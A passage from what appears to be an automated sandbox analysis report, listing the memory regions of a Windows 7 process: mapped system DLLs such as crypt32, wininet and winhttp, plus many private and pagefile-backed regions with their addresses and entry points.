"c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 738 start_va = 0x7fefc450000 end_va = 0x7fefc559fff monitored = 0 entry_point = 0x7fefc451010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 739 start_va = 0x7fefc560000 end_va = 0x7fefc739fff monitored = 0 entry_point = 0x7fefc563130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 740 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 741 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 742 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 743 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 744 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 745 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 746 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 747 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 748 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 749 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 750 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 751 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 752 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 753 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 754 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 755 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 756 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 757 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 758 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 759 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 760 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 761 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 762 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 763 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 764 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 765 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 766 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 767 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 768 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 769 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 770 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 771 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 772 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 773 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 774 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 775 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 776 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 777 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 778 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 779 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 780 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 781 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 782 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 783 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 784 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 785 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 786 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 787 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 788 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 789 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 790 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 791 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 792 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 793 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 794 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 795 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 796 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 797 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 798 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 799 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 800 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 801 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 802 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 803 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 804 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 805 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 806 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 807 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 808 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 809 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 810 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 811 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 812 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 813 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 814 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 815 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 816 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 818 start_va = 0x36c0000 end_va = 0x36d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036c0000" filename = "" Region: id = 819 start_va = 0x80d0000 end_va = 0x814ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080d0000" filename = "" Region: id = 820 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 821 start_va = 0x8150000 end_va = 0x836ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008150000" filename = "" Region: id = 822 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 823 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 824 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 825 start_va = 0x8150000 end_va = 0x822ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008150000" filename = "" Region: id = 826 start_va = 0x82f0000 end_va = 0x836ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082f0000" filename = "" Region: id = 827 start_va = 0x36e0000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 828 start_va = 0x5d00000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 829 start_va = 0x83b0000 end_va = 0x842ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083b0000" filename = "" Region: id = 830 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 831 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 832 start_va = 0x36e0000 end_va = 0x36f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 833 start_va = 0x3700000 end_va = 0x370dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 834 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 835 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 836 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 837 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 838 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 839 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 840 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 841 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 842 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 843 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 844 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 845 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 846 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 847 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 848 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 849 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 850 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 851 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 852 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 853 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 854 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 855 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 856 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 857 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 858 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 859 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 860 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 861 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 862 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 863 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 864 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 865 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 866 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 867 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 868 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 869 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 870 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 871 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 872 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 873 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 874 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 875 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 876 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 877 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 878 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 879 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 880 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 881 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 882 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 883 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 884 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 885 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 886 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 887 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 888 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 889 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 890 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 891 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 892 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 893 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 894 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 895 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = 